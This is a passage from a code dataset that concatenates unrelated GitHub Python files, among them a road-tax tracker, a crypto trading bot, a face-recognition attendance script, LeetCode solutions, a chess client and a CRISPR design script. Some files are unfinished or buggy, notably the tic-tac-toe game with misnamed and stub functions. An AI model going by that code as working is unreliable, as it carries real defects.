Vehicle(Model):\n vehicle_no = CharField(primary_key=True)\n expiry_date = DateField()\n is_informed = BooleanField(default=False)\n is_inspected = BooleanField(default=False)\n is_renewed = BooleanField(default=False)\n\n # @classmethod\n # def create(cls, vehicle_no, expiry_date):\n # # WIP\n # # parsed_date = None\n # # super(vehicle_no=vehicle_no, expiry_date=_parse_date(expiry_date))\n # return\n\n @staticmethod\n def _parse_date(date):\n if type(date) is datetime:\n return date\n try:\n return datetime.strptime(date, '%d/%m/%Y')\n except ValueError:\n return datetime.strptime(date, '%d.%m.%Y')\n raise ValueError(\"date format must be dd.mm.YYYY\")\n\n class Meta:\n database = db\n\n\nclass Crud:\n def add_new(self, vehicle, expiry):\n try:\n self.parsed_date = datetime.strptime(expiry, '%d/%m/%Y')\n self.create_new = Vehicle.create(\n vehicle_no=vehicle, expiry_date=self.parsed_date)\n return \"New record created\"\n except ValueError:\n try:\n self.parsed_date = datetime.strptime(expiry, '%d.%m.%Y')\n self.create_new = Vehicle.create(\n vehicle_no=vehicle, expiry_date=self.parsed_date)\n return \"New record created\"\n except:\n self.msg = \"date format must be dd.mm.YYYY\"\n return self.msg if vehicle else None\n\n except:\n self.update_row = (Vehicle\n .update(expiry_date=self.parsed_date)\n .where(Vehicle.vehicle_no == vehicle)\n .execute())\n return \"Attempting to make change to existing vehicle.\"\n finally:\n db.close()\n\n def sort_all(self):\n self.query_orderby = Vehicle.select().order_by(Vehicle.expiry_date)\n self.display = []\n for item in self.query_orderby:\n self.display.append([item.vehicle_no, item.expiry_date, item.is_informed,\n item.is_inspected, item.is_renewed])\n db.close()\n return list(self.display)\n\n def sort_within(self, day):\n self.day = 1 if day == '' else day\n self.withindays = dt.timedelta(days=int(self.day))\n self.display = []\n self.query_within_days = Vehicle.select().where(Vehicle.expiry_date <=\n date.today() + self.withindays).order_by(Vehicle.expiry_date)\n for item in self.query_within_days:\n self.display.append([item.vehicle_no, date.strftime(item.expiry_date, '%d/%m/%Y'), item.is_informed,\n item.is_inspected, item.is_renewed])\n db.close()\n return self.display\n\n def update_checks(self,\n vehicle,\n expiry,\n inform=False,\n inspect=False,\n renew=False):\n if vehicle is None:\n return None\n try:\n self.parsed_date = datetime.strptime(expiry, '%d/%m/%Y')\n except:\n pass\n self.update_row = (Vehicle\n .update(is_informed=inform,\n is_inspected=inspect,\n is_renewed=renew,\n expiry_date=self.parsed_date + dt.timedelta(days=182.5))\n .where(Vehicle.vehicle_no == vehicle)\n .execute())\n db.close()\n if inform and inspect and renew:\n return f\"{vehicle} renewed, expiry date updated to 6 months from now.\"\n return f\"{vehicle} updated\"\n\n def delete_item(self, vehicle):\n if vehicle is None:\n return None\n self.del_it = Vehicle.delete().where(Vehicle.vehicle_no == vehicle).execute()\n db.close()\n return f\"{vehicle} Deleted!\"\n\ndb.connect()\n# print(db.get_tables()) # Printing all the tables in database\ndb.create_tables([Vehicle])\ndb.close()\n","repo_name":"Stewart86/roadtaxTracker","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"21757525630","text":"import time\nimport traceback\nimport requests\n\nfrom library import setup_logger, TradeAsset, get_remaining_btc_binance, adjust_buy_asset_btc_volume, start_trading\n\ntrade_assets = [\n TradeAsset('CELR'),\n TradeAsset('FTM'),\n TradeAsset('ONE'),\n TradeAsset('MATIC'),\n TradeAsset('ALGO')\n ]\n\nlogger = setup_logger(\"trader\")\n\nwhile 1:\n try:\n _btc = get_remaining_btc_binance()\n btc_value = 0.0013 if _btc > 0.0013 else _btc\n adjust_buy_asset_btc_volume(trade_assets, btc_value)\n\n for trade_asset in trade_assets: # remove asset from here\n start_trading(trade_asset, btc_value)\n\n time.sleep(40)\n except Exception as err:\n if isinstance(err, requests.exceptions.ConnectionError):\n logger.error(\"Connection problem...\")\n else:\n traceback.print_tb(err.__traceback__)\n logger.exception(err.__traceback__)","repo_name":"sroziewski/trading-bot","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44697813308","text":"import matplotlib.pyplot as plt\nfrom mtcnn.mtcnn import MTCNN\nfrom numpy import expand_dims\nfrom numpy import asarray\nfrom keras.models import load_model\nimport numpy as np\nimport cv2\nimport os\nfrom PIL import Image\nimport argparse\nimport pickle\nimport os\nimport sys\n\nif not sys.warnoptions:\n import warnings\n warnings.simplefilter(\"ignore\")\n\ndef get_faces_cropped_from_input(detector, input_dir):\n required_size = (160,160)\n img_file_lst = os.listdir(input_dir)\n cropped_faces_array_list = []\n\n for img_file in img_file_lst:\n path = input_dir + \"/\" + img_file\n img = plt.imread(path)\n # detect faces in the image\n face = detector.detect_faces(img)\n if face:\n bbox = face[0]['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n\n return cropped_faces_array_list\n\ndef get_faces_cropped_from_videos_prediction(detector, img):\n required_size = (160, 160)\n # img_file_lst = os.listdir(predict_dir)\n cropped_faces_array_list = []\n face_location = []\n # img = plt.imread(path)\n\n\n # detect faces in the image\n face = detector.detect_faces(img)\n for face in face:\n if face['confidence'] > 0.90:\n bbox = face['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n face_location.append(face)\n\n dict = {\n \"face_location\": face_location,\n \"cropped_faces_array_list\": cropped_faces_array_list\n }\n\n return cropped_faces_array_list, face_location, dict\n\ndef get_faces_cropped_from_prediction(detector, path):\n required_size = (160, 160)\n # img_file_lst = os.listdir(predict_dir)\n cropped_faces_array_list = []\n face_location = []\n img = plt.imread(path)\n\n\n # detect faces in the image\n face = detector.detect_faces(img)\n for face in face:\n if face['confidence'] > 0.90:\n bbox = face['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n face_location.append(face)\n\n dict = {\n \"face_location\": face_location,\n \"cropped_faces_array_list\": cropped_faces_array_list\n }\n\n return cropped_faces_array_list, face_location, dict\n\ndef get_faces_cropped_from_prediction_video(detector, img):\n required_size = (160, 160)\n # img_file_lst = os.listdir(predict_dir)\n cropped_faces_array_list = []\n face_location = []\n # img = plt.imread(path)\n\n\n # detect faces in the image\n face = detector.detect_faces(img)\n if not face:\n pass\n for face in face:\n if face['confidence'] > 0.90:\n bbox = face['box']\n x1, y1, width, height = bbox\n x2, y2 = x1 + width, y1 + height\n cropped_face = img[y1:y2, x1:x2]\n plt.imshow(cropped_face)\n cropped_face_array = Image.fromarray(cropped_face)\n cropped_face_array = cropped_face_array.resize(required_size)\n cropped_face_array = asarray(cropped_face_array)\n cropped_faces_array_list.append(cropped_face_array)\n face_location.append(face)\n\n dict = {\n \"face_location\": face_location,\n \"cropped_faces_array_list\": cropped_faces_array_list\n }\n\n return cropped_faces_array_list, face_location, dict\n\ndef get_embedding(model, cropped_face_list):\n\n embeddibgs = []\n for cropped_face in cropped_face_list:\n cropped_face = cropped_face.astype('float32')\n # standardize pixel values across channels (global)\n mean, std = cropped_face.mean(), cropped_face.std()\n cropped_face = (cropped_face - mean) / std\n # transform face into one sample\n samples = expand_dims(cropped_face, axis=0)\n # make prediction to get embedding\n yhat = model.predict(samples)\n embeddibgs.append(yhat[0])\n return embeddibgs\n\ndef euclidean(x,y):\n return np.sqrt(np.sum((x-y)**2))\n\ndef get_face_names(input_dir):\n\n img_file_lst = os.listdir(input_dir)\n known_face_names = []\n for img_file in img_file_lst:\n img_name = img_file.rsplit(\".\", 1)[0]\n known_face_names.append(str(img_name))\n return known_face_names\n\ndef save_input_feature_embedding(inputs_embedding, known_faces):\n\n x = zip(known_faces, inputs_embedding)\n features = []\n for itr in x:\n features.append({itr[0]:itr[1]})\n\n\n with open('input_data.p', 'wb') as fp:\n pickle.dump(features, fp, protocol=pickle.HIGHEST_PROTOCOL)\n\ndef load_input_feature_embedding():\n with open('input_data.p', 'rb') as fp:\n data = pickle.load(fp)\n return data\n\ndef face_matching_from_image(img_path, predict_embedding, data, face_array_and_loc, tolerance):\n img = plt.imread(img_path)\n img_name = os.path.basename(img_path)\n for idx1, emb in enumerate(predict_embedding):\n name = 'Unknown'\n matches = []\n for d in data:\n for k,v in d.items():\n dist = euclidean(emb, v)\n matches.append({k:dist})\n\n # index_min = np.argmin(matches)\n for m in matches:\n for k,v in m.items():\n if v <= int(tolerance):\n name = str(k)\n x, y, width, height = face_array_and_loc['face_location'][idx1]['box']\n image = cv2.rectangle(img, (x, y), (x + width, y + height), (255, 36, 12), 1)\n cv2.putText(image, name, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 36, 12), 1)\n\n plt.imshow(image)\n plt.show()\n cv2.imwrite('./output_dir/'+ img_name, cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\ndef face_matching_from_video(img, predict_embedding, data, face_array_and_loc, tolerance):\n # img = plt.imread(img_path)\n # img_name = os.path.basename(img_path)\n for idx1, emb in enumerate(predict_embedding):\n name = 'Unknown'\n matches = []\n for d in data:\n for k,v in d.items():\n dist = euclidean(emb, v)\n matches.append({k:dist})\n\n # index_min = np.argmin(matches)\n for m in matches:\n for k,v in m.items():\n if v <= int(tolerance):\n name = str(k)\n x, y, width, height = face_array_and_loc['face_location'][idx1]['box']\n image = cv2.rectangle(img, (x, y), (x + width, y + height), (255, 36, 12), 1)\n cv2.putText(image, name, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 36, 12), 1)\n return img\n # plt.imshow(image)\n # plt.show()\n # fourcc = cv2.VideoWriter_fourcc(*'XVID')\n # output_movie = cv2.VideoWriter('output_now.avi', fourcc, 29.97, (640, 360))\n # output_movie.write(img)\n # cv2.imwrite('./output_dir_now_video/'+ img_name, cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\ndef get_video_frame_recognition():\n import numpy as np\n import cv2\n\n cap = cv2.VideoCapture('videoplayback.mp4')\n\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480))\n\n while (cap.isOpened()):\n ret, frame = cap.read()\n if ret == True:\n # frame = cv2.flip(frame, 0)\n predict_face_array_list, face_location, face_array_and_loc = get_faces_cropped_from_prediction_video(\n detector, frame)\n data = load_input_feature_embedding()\n predict_embedding = get_embedding(model, predict_face_array_list)\n frame_matched = face_matching_from_video(frame, predict_embedding, data, face_array_and_loc, tolerance=10)\n print(\"Video saved\")\n\n # write the flipped frame\n out.write(frame_matched)\n\n # cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n # Release everything if job is finished\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n\n model = load_model('model/facenet_keras.h5')\n detector = MTCNN()\n data = load_input_feature_embedding()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"select\",\n help=\"select training or inference\", type=str)\n\n parser.add_argument(\"-img\",\"--image\",\n help=\"image file name from predict dir\", type=str)\n args = parser.parse_args()\n select = args.select\n\n if select == 'train':\n input_dir = './input_dir'\n input_faces_array_list = get_faces_cropped_from_input(detector, input_dir)\n known_faces = get_face_names(input_dir)\n inputs_embedding = get_embedding(model, input_faces_array_list)\n save_input_feature_embedding(inputs_embedding, known_faces)\n\n elif select == 'inference':\n predict_dir = './predict_dir'\n img_path = predict_dir + '/' + args.image\n print(args.image)\n predict_face_array_list, face_location, face_array_and_loc = get_faces_cropped_from_prediction(detector, img_path)\n data = load_input_feature_embedding()\n predict_embedding = get_embedding(model, predict_face_array_list)\n face_matching_from_image(img_path, predict_embedding, data, face_array_and_loc, tolerance=10)\n print(\"Image saved\")\n\n elif select == 'video':\n # Get frames from video and save to directory\n get_video_frame_recognition()\n # predict_dir = './output_dir_video'\n # # lsorted = sorted(l, key=lambda x: int(os.path.splitext(x)[0]))\n # for img_file in (os.listdir(predict_dir)):\n # img_path = predict_dir + '/' + img_file\n # print(img_path)\n # predict_face_array_list, face_location, face_array_and_loc = get_faces_cropped_from_prediction_video(detector, img)\n # data = load_input_feature_embedding()\n # predict_embedding = get_embedding(model, predict_face_array_list)\n # face_matching_from_video(img_path, predict_embedding, data, face_array_and_loc, tolerance=10)\n # print(\"Video saved\")\n","repo_name":"HiteshAI/face_recognition_for_attendance","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22847583637","text":"class Solution:\n # @param A : list of integers\n # @param B : list of integers\n # @return an integer\n def coverPoints(self, A, B):\n if len(A) in [0, 1]:\n return 0\n x = A[0]\n y = B[0]\n dist = 0\n for i in range(1, len(A)):\n distX = abs(A[i] - x)\n distY = abs(B[i] - y)\n x = A[i]\n y = B[i]\n dist += max(distX, distY)\n return dist\n","repo_name":"rednithin/InterviewBit","sub_path":"MinStepsInInfiniteGrid.py","file_name":"MinStepsInInfiniteGrid.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70018921767","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\n\n\nclass UserProfile(models.Model):\n profile_picture = models.ImageField(\n upload_to='images/profile_pictures'\n )\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True,\n )\n\n","repo_name":"kaloyan03/Softuni-Python","sub_path":"Python Web Basics/petstagram/petstagram/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36738219082","text":"import json\nimport logging\nimport sys\nimport threading\nimport time\n\nfrom game.Game import Game\nfrom networking.command import *\nfrom networking.network import Network\nfrom player.PlayerManager import PlayerManager\n\n\ndef network_thread(some_param):\n logging.info(\"hello\")\n\n run = True\n n = Network()\n\n pm = PlayerManager.get_instance()\n\n game_is_on = False\n my_id = None\n\n req = HelloCommand()\n res = Command.parse(n.send(req.print()))\n logging.info(f\"=> {res.print()}\")\n\n if res.type == CommandType.HELLO:\n my_id = int(res.payload[7:])\n logging.info(f\"i am {my_id}\")\n\n while run:\n\n if game_is_on:\n if Game.get_instance().is_quit():\n print(\"Game is over, network thread exiting\")\n break\n\n if pm.get_instance().my_turn():\n if Game.get_instance().board.state.type_of_state() == 'frozen' \\\n or Game.get_instance().board.state.type_of_state() == 'won_game':\n # player chose action, we can send it to the network\n state_json = json.dumps(Game.get_instance().board.export_state())\n req = StepCommand(state_json)\n else:\n # player is choosing figure and destination\n time.sleep(.5)\n continue\n else:\n req = PingCommand()\n else:\n req = PingCommand()\n\n res_raw = n.send(req.print())\n if res_raw is None or res_raw == \"\":\n print(f\"got: {res_raw}\")\n continue\n res = Command.parse(res_raw)\n logging.info(f\"=> {res.print()}\")\n\n if res.type == CommandType.STATE:\n game_is_on = True\n\n if pm.get_instance().my_player is None:\n pm.add_own_player_id(my_id)\n pm.add_other_player_id(1 - my_id)\n\n pm.create_players(0)\n\n new_state_json = res.payload[10:]\n new_state = None\n try:\n if len(new_state_json) > 0:\n new_state = json.loads(new_state_json)\n except Exception as e:\n logging.error(f\"json decode error {e}\")\n continue\n\n if len(new_state_json) > 0 and new_state is not None:\n Game.get_instance().board.import_state(new_state)\n\n if int(res.payload[8:9]) == my_id:\n logging.info(\"my turn\")\n pm.get_instance().turn_of(my_id)\n Game.get_instance().board.transition_to(Game.get_instance().board.choosing_acting_figure_state)\n else:\n pm.get_instance().turn_of(1 - my_id)\n\n elif res.type == CommandType.WAIT:\n pass\n\n elif res.type == CommandType.ERROR:\n print(\"recieved error\")\n pass\n\n else:\n logging.warning(\"unexpected message\")\n\n time.sleep(1)\n\n\ndef run_network_thread():\n x = threading.Thread(target=network_thread, args=(1,))\n x.start()\n\n\nif __name__ == '__main__':\n print(\"running with args\", sys.argv)\n if len(sys.argv) > 1:\n if sys.argv[1] == \"debug\":\n logging.basicConfig(level=logging.DEBUG)\n\n run_network_thread()\n","repo_name":"sebinemeth/chesscraft-client","sub_path":"networking/network_client.py","file_name":"network_client.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13728897899","text":"\"\"\"\nInstall the viewser package\n\"\"\"\nimport setuptools\n\nwith open(\"README.md\") as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"viewser\",\n version=\"0.0.1\",\n author=\"Peder G. Landsverk\",\n author_email=\"pedlan@prio.org\",\n description=\"Client library for interacting with ViEWS cloud\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/uppsalaconflictdataprogram/viewser\",\n packages=setuptools.find_packages(),\n python_requires=\"==3.8.5\",\n install_requires=[\n \"pyarrow==2.0.0\",\n \"pandas==1.2.0\",\n \"requests==2.25.1\",\n \"fire==0.3.1\"\n ],\n scripts=[\n \"bin/vsr\"\n ]\n)\n","repo_name":"UppsalaConflictDataProgram/viewser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73953936169","text":"\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\n \nclass PalindromeLinkedList:\n# O(n) || O(1) where n is the nuber of elements present in the\n def isPalindrome(self, node):\n slow, fast = node, node.next\n\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n \n middleNode = slow.next\n slow.next = None\n\n reversedList = self.reverseLinkedList(middleNode)\n\n firstHalf = node\n\n while reversedList is not None:\n if reversedList.value != firstHalf.value:\n return False\n reversedList = reversedList.next\n firstHalf = firstHalf.next\n\n return True\n\n \n def reverseLinkedList(self, middleNode):\n prev = None\n while middleNode is not None:\n next = middleNode.next\n middleNode.next = prev\n prev = middleNode\n middleNode = next\n\n return prev\n\n \n\n# O(N) || O(N) where n is the number of nodes present in the linkedlist\n def palindromeLinkedListByList(self, node):\n if not node:\n return node\n\n stack = []\n\n while node is not None:\n stack.append(node.value)\n node = node.next\n\n left, right = 0, len(stack) - 1\n\n while left < right:\n if stack[left] == stack[right]:\n left += 1\n right -= 1\n else:\n return False\n\n\n return True\n\n\nnode = Node(1)\nnode.next = Node(1)\nnode.next.next = Node(2)\nnode.next.next.next = Node(1)\nnode.next.next.next.next = Node(1)\n\nsol = PalindromeLinkedList()\n\n\nprint(sol.isPalindrome(node))\n# print(sol.palindromeLinkedListByList(node))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/palindromeLinkedList.py","file_name":"palindromeLinkedList.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28792800993","text":"\"\"\"\nStep 1: board\nStep 2: display board\nStep 3: play game\nStep 4: handle turn\nStep 5: check win (if game over)\n 5.1: check rows\n 5.2: check columns\n 5.3: check diagonals\nStep 6: check tie\nStep 7: flip player\n\"\"\"\n\n#----Global Variables-----\n\n#Game board\nboard = [\"-\",\"-\",\"-\",\n \"-\",\"-\",\"-\",\n \"-\",\"-\",\"-\"]\n\n#if is still going\ngame_still_going = True\n\n#Who won?\nwinner = None\n\n#Who's turn is it\ncurrent_player = \"X\"\n\n#display board\ndef display_board():\n print(board[0] + \"|\" +board[1] + \"|\" + board[2] + \"|\")\n print(board[3] + \"|\" + board[4] + \"|\" + board[5] + \"|\")\n print(board[6] + \"|\" + board[7] + \"|\" + board[8] + \"|\")\n\n#Play a game of tic tac toe\ndef play_game():\n #Display the initial board\n display_board()\n\n #while the game is still going\n while game_still_going:\n \n #handle a single turn of an arbitrary player\n handle_turn(current_player)\n\n #check if the game has ended\n check_if_game_over()\n\n #flip to the game has player\n flip_player()\n\n\n#The game has ended\nif winner == \"X\" or winner ==\"O\":\n print(winner + \" won\")\nelif winner == None:\n print(\"It's a tie.\")\n \n#Handle a single turn of an arbitrary player \ndef handle_turn(player):\n position_str = input(\"Choose a position from 1 to 9: \")\n position = int(position_str) - 1 #since board has positions 0-8 we need to subtrace one from position so it knows excatly where to go\n\n board[position] = \"X\"\n\n display_board()\n\n\ndef check_if_game_over():\n check_for_winner()\n check_if_tie()\n\ndef check_for_winner():\n\n #set up global variables so that winner is inside the scope of check_for_winner\n global winner\n \n #check row\n row_winner = check_row()\n #check columns\n columns_winnr = check_columns()\n #check diagonals\n diagonal_winner = check_diagonals()\n \n if row_winner:\n\n winner = row_winner()\n \n elif column_winner:\n \n winner = column_winner()\n \n elif diagonal_winner:\n \n winner = diagonal_winner()\n \n else:\n \n winner = None\n \n return\n\n#check rows\ndef check_rows():\n row_1 = board[0] == board[1] == board[2] != \"-\"\n row_2 = board[3] == board[4] == board[5] != \"-\"\n row_3 = board[6] == board[7] == board[8] != \"-\"\n return\n\n#check colums\ndef check_columns():\n column_1 = board[1] == b\n return\n\n#check diagonals\ndef check_diagonals():\n return\n\ndef check_if_tie():\n \n return\n\ndef flip_player():\n return\n\n\nplay_game()\n","repo_name":"mariannauf/TicTacToe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37016671747","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n \"alembic==1.7.6\",\n \"cryptography==36.0.1\",\n \"flask==1.1.0\",\n \"itsdangerous==2.0.1\",\n \"orjson==3.6.7\",\n \"pydantic==1.9.0\",\n \"PyMySQL==1.0.2\",\n \"sqlalchemy==1.4.31\",\n \"structlog==21.5.0\",\n]\ndeploy_requires = [\"uwsgi==2.0.20\"]\ndev_requires = [\"autoflake==1.4\", \"black==22.1.0\", \"isort==5.10.1\"]\ntest_requires = [\n \"coverage==6.3.1\",\n \"pytest==7.0.1\",\n \"pytest-cov==3.0.0\",\n \"pytest-html==3.1.1\",\n \"tox==3.24.5\",\n]\n\nsetup(\n name=\"gogolook\",\n version=\"0.1.0\",\n description=\"A Restful task list API\",\n author=\"Jacob Chen\",\n author_email=\"chenjr0719@gmail.com\",\n packages=find_packages(exclude=[\"tests\"]),\n install_requires=install_requires,\n extras_require={\n \"dev\": dev_requires + test_requires,\n \"test\": test_requires,\n \"deploy\": deploy_requires,\n },\n)\n","repo_name":"chenjr0719/Gogolook-Exercise","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29608756062","text":"count = 0\r\nred = 1\r\nfor i in range(1, 1001):\r\n if i % 12 == 0 and i % 7 != 0:\r\n print(i, end = \" \")\r\n count = count + 1\r\n red = red + 1\r\n if red > 6:\r\n red = 1\r\n print()\r\n\r\nprint(f\"Ukupno je ispisano {count} brojeva.\")","repo_name":"miki261/vsite","sub_path":"(3).py","file_name":"(3).py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70021019368","text":"from Bio import SeqIO\nimport glob\nfrom time import clock\nimport re\nimport numpy as np\n\nimport Util\nimport Logic\nimport LogicPrep\nimport Valid\n\n############### start to set env ################\nWORK_DIR = \"D:/000_WORK/JangHyeWon_ShinJeongHong/20200527/WORK_DIR/\"\n\nREF_PATH = \"D:/000_WORK/000_reference_path/monkey/Crab-eating macaque/\"\nCDS_FILE = \"cds/Macaca_fascicularis.Macaca_fascicularis_5.0.cds.all.fa\"\nTEST_CDS_FILE = \"cds/Macaca_fascicularis.Macaca_fascicularis_5.0.cds.test.fa\"\n\nANNO_FILE = \"genbank_anno/macaca_fascicularis/Macaca_fascicularis.Macaca_fascicularis_5.0.100.chromosome.\"\n\nFRONT_WIN_LEN = 4\ngRNA_LEN = 20\nPAM_SEQ = \"NGG\"\nBACK_WIN_LEN = 20\n\nIGNORE_CHR_LIST = ['MT', 'KE']\nINIT_DEEP_PE = [PAM_SEQ, FRONT_WIN_LEN, gRNA_LEN, BACK_WIN_LEN]\nA_or_C_IDX = [4, 10]\nACTG_RULE = ['A', 'C']\n############## make_deep_pe_input ##############\n\nBE_BACK_WIN_LEN = 3\nCLEAVAGE_SITE = 3\nMAX_MISMATCH = 3\nREF_SRV_PATH = \"FASTA/Crab-eating macaque\"\n\n\nINIT_BE = [PAM_SEQ, FRONT_WIN_LEN, gRNA_LEN, BE_BACK_WIN_LEN, CLEAVAGE_SITE]\nINITIAL_CAS_OFF1 = ['NGG', gRNA_LEN, MAX_MISMATCH, 66, WORK_DIR + \"CAS_OFF_FINDER/crab_eating_monkey_off_\", REF_SRV_PATH, INIT_BE]\nINITIAL_CAS_OFF2 = ['NGG', gRNA_LEN, MAX_MISMATCH, 1, WORK_DIR + \"CAS_OFF_FINDER/crab_eating_monkey_off_aqia_\", REF_SRV_PATH, INIT_BE]\n#################### top N #####################\nTOP_N = 10\nTOP_N_ALL = 100\nINIT_MERGE_BY_CHAR = [REF_PATH, CDS_FILE, A_or_C_IDX, ACTG_RULE, WORK_DIR, TOP_N]\nINIT_MERGE_BY_ALL = [REF_PATH, CDS_FILE, A_or_C_IDX, ACTG_RULE, WORK_DIR, TOP_N_ALL]\n############### end setting env ################\n\n\ndef sort_n_merge_by_all():\n logic = Logic.Logics()\n logic.sort_n_merge_by_all(INIT_MERGE_BY_ALL, INIT_BE, IGNORE_CHR_LIST)\n\ndef sort_n_merge_by_chr():\n logic = Logic.Logics()\n logic.sort_n_merge_by_chr(INIT_MERGE_BY_CHAR, INIT_BE, IGNORE_CHR_LIST)\n\ndef merge_cas9_abe_cbe():\n logic = Logic.Logics()\n logic_prep = LogicPrep.LogicPreps()\n util = Util.Utils()\n\n trgt_seq_dict = logic_prep.get_target_seq_with_clvg_site(REF_PATH + CDS_FILE, INIT_BE)\n chr_dict, aqia_chr_dict = logic_prep.target_seq_with_clvg_site_group_by_chromosome(trgt_seq_dict, \":Macaca_fascicularis_5.0:\", IGNORE_CHR_LIST)\n\n a_c_dict= logic.filter_out_by_ACGTU_rule(chr_dict, A_or_C_IDX, ACTG_RULE)\n aqia_a_c_dict = logic.filter_out_by_ACGTU_rule(aqia_chr_dict, A_or_C_IDX, ACTG_RULE)\n\n abe_score_dict = logic_prep.get_deep_base_ed_score(WORK_DIR + \"deep_ABE/ABE_Efficiency.txt\")\n cbe_score_dict = logic_prep.get_deep_base_ed_score(WORK_DIR + \"deep_CBE/CBE_Efficiency.txt\")\n cs9_score_dict = logic_prep.get_deep_cas9_tupl(WORK_DIR + \"deep_cas_9/\", \"RANK_final_DeepCas9_Final.txt\",\n \"sample.txt\")\n\n util.make_merge_excel_by_chr(WORK_DIR + \"merge_cas9_abe_cbe/crab_eating_monkey_merge_abe_cbe_cas9\",\n [a_c_dict, abe_score_dict, cbe_score_dict, cs9_score_dict], INIT_BE)\n\n util.make_merge_excel(WORK_DIR + \"merge_cas9_abe_cbe/crab_eating_monkey_merge_abe_cbe_cas9_AQIA\",\n [aqia_a_c_dict, abe_score_dict, cbe_score_dict, cs9_score_dict], INIT_BE)\n\ndef make_deep_cas9_base_editor_input():\n logic = Logic.Logics()\n logic_prep = LogicPrep.LogicPreps()\n util = Util.Utils()\n\n trgt_seq_dict = logic_prep.get_target_seq_with_clvg_site(REF_PATH + CDS_FILE, INIT_BE)\n chr_dict, aqia_chr_dict = logic_prep.target_seq_with_clvg_site_group_by_chromosome(trgt_seq_dict,\n \":Macaca_fascicularis_5.0:\",\n IGNORE_CHR_LIST)\n\n a_c_dict = logic.filter_out_by_ACGTU_rule(chr_dict, A_or_C_IDX, ACTG_RULE)\n aqia_a_c_dict = logic.filter_out_by_ACGTU_rule(aqia_chr_dict, A_or_C_IDX, ACTG_RULE)\n\n util.make_cas_off_finder_input(a_c_dict, INITIAL_CAS_OFF1)\n util.make_cas_off_finder_input(aqia_a_c_dict, INITIAL_CAS_OFF2)\n\n util.make_deep_cas9_input(WORK_DIR + \"deep_cas_9/sample\", [a_c_dict, aqia_a_c_dict], INIT_BE)\n\ndef make_deep_pe_input():\n logic = Logic.Logics()\n logic_prep = LogicPrep.LogicPreps()\n util = Util.Utils()\n\n trgt_seq_dict = logic_prep.get_target_seq(REF_PATH + CDS_FILE, INIT_DEEP_PE)\n result_dict, aqia_dict = logic_prep.group_by_chromosome(trgt_seq_dict, \":Macaca_fascicularis_5.0:\", IGNORE_CHR_LIST)\n\n # util.make_Deep_PE_input_excel(WORK_DIR + \"marmoset/\", result_dict, INIT_DEEP_PE)\n # util.make_Deep_PE_input_AQIA(WORK_DIR + \"marmoset/\", aqia_dict)\n util.make_Deep_PE_input_tb_txt(WORK_DIR + 